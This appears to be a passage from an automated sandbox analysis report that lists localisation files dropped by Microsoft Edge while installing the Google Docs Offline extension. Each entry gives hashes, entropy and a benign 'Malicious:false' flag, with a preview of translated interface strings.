                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):939
                                                                                                                                                            Entropy (8bit):4.451724169062555
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                            MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                            SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                            SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                            SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):977
                                                                                                                                                            Entropy (8bit):4.622066056638277
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                            MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                            SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                            SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                            SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):972
                                                                                                                                                            Entropy (8bit):4.621319511196614
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                            MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                            SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                            SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                            SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):990
                                                                                                                                                            Entropy (8bit):4.497202347098541
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                            MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                            SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                            SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                            SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1658
                                                                                                                                                            Entropy (8bit):4.294833932445159
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                            MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                            SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                            SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                            SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1672
                                                                                                                                                            Entropy (8bit):4.314484457325167
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                            MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                            SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                            SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                            SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):935
                                                                                                                                                            Entropy (8bit):4.6369398601609735
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                            MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                            SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                            SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                            SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1065
                                                                                                                                                            Entropy (8bit):4.816501737523951
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                                            MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                                            SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                                            SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                                            SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2771
                                                                                                                                                            Entropy (8bit):3.7629875118570055
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                                            MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                                            SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                                            SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                                            SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):858
                                                                                                                                                            Entropy (8bit):4.474411340525479
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                                            MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                                            SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                                            SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                                            SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):954
                                                                                                                                                            Entropy (8bit):4.6457079159286545
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:YGXU2rOcxGe+J97M9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95Mw89KkJ+je:YwBrD2g2DBLMfFuWvdpY94viDO+uh
                                                                                                                                                            MD5:CAEB37F451B5B5E9F5EB2E7E7F46E2D7
                                                                                                                                                            SHA1:F917F9EAE268A385A10DB3E19E3CC3ACED56D02E
                                                                                                                                                            SHA-256:943E61988C859BB088F548889F0449885525DD660626A89BA67B2C94CFBFBB1B
                                                                                                                                                            SHA-512:A55DEC2404E1D7FA5A05475284CBECC2A6208730F09A227D75FDD4AC82CE50F3751C89DC687C14B91950F9AA85503BD6BF705113F2F1D478E728DF64D476A9EE
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google-skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google-skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):899
                                                                                                                                                            Entropy (8bit):4.474743599345443
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                                            MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                                            SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                                            SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                                            SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):2230
                                                                                                                                                            Entropy (8bit):3.8239097369647634
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                                            MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                                            SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                                            SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                                            SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{"createnew":{"message":"\u05d9\u05e6\u05d9\u05e8\u05ea \u05d7\u05d3\u05e9"},"explanationofflinedisabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8. \u05db\u05d3\u05d9 \u05dc\u05d4\u05e9\u05ea\u05de\u05e9 \u05d1-Google Docs \u05dc\u05dc\u05d0 \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d1\u05d4\u05ea\u05d7\u05d1\u05e8\u05d5\u05ea \u05d4\u05d1\u05d0\u05d4 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e8\u05e0\u05d8, \u05d9\u05e9 \u05dc\u05e2\u05d1\u05d5\u05e8 \u05dc\u05e7\u05d8\u05e2 \u05d4\u05d4\u05d2\u05d3\u05e8\u05d5\u05ea \u05d1\u05d3\u05e3 \u05d4\u05d1\u05d9\u05ea \u05e9\u05dc Google Docs \u05d5\u05dc\u05d4\u05e4\u05e2\u05d9\u05dc \u05e1\u05e0\u05db\u05e8\u05d5\u05df \u05d1\u05de\u05e6\u05d1 \u05d0\u05d5\u05e4\u05dc\u05d9\u05d9\u05df."},"explanationofflineenabled":{"message":"\u05d0\u05d9\u05df \u05dc\u05da \u05d7\u05d9\u05d1\u05d5\u05e8 \u05dc\u05d0\u05d9\u05e0\u05d8\u05e

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ja\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1160
                                                                                                                                                            Entropy (8bit):5.292894989863142
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:1HAoc3IiRF1viQ1RF3CMP3rnicCCAFrr1Oo0Y5ReXCCQkb:Dc3zF7F3CMTnOCAFVLHXCFb
                                                                                                                                                            MD5:15EC1963FC113D4AD6E7E59AE5DE7C0A
                                                                                                                                                            SHA1:4017FC6D8B302335469091B91D063B07C9E12109
                                                                                                                                                            SHA-256:34AC08F3C4F2D42962A3395508818B48CA323D22F498738CC9F09E78CB197D73
                                                                                                                                                            SHA-512:427251F471FA3B759CA1555E9600C10F755BC023701D058FF661BEC605B6AB94CFB3456C1FEA68D12B4D815FFBAFABCEB6C12311DD1199FC783ED6863AF97C0F
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:{.. "createnew": {.. "message": "....".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ............................... Google .............. [..] .......[.......] ...........".. },.. "explanationofflineenabled": {.. "message": ".............................................".. },.. "extdesc": {.. "message": ".........................................................".. },.. "extname": {.. "message": "Google ..... ......".. },.. "learnmore": {.. "message": "..".. },.. "popuphelp

                                                                                                                                                            C:\Users\user\AppData\Local\Temp\scoped_dir2352_763075313\CRX_INSTALL\_locales\ka\messages.json

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            File Type:JSON data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):3264
                                                                                                                                                            Entropy (8bit):3.586016059431306
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:48:YGFbhVhVn0nM/XGbQTvxnItVJW/476CFdqaxWNlR:HFbhV/n0MfGbw875FkaANlR
                                                                                                                                                            MD5:83F81D30913DC4344573D7A58BD20D85
                                                                                                                                                            SHA1:5AD0E91EA18045232A8F9DF1627007FE506A70E0
                                                                                                                                                            SHA-256:30898BBF51BDD58DB397FF780F061E33431A38EF5CFC288B5177ECF76B399F26
                                                                                                                                                            SHA-512:85F97F12AD4482B5D9A6166BB2AE3C4458A582CF575190C71C1D8E0FB87C58482F8C0EFEAD56E3A70EDD42BED945816DB5E07732AD27B8FFC93F4093710DD58F
                                                                                                                                                            Malicious:false
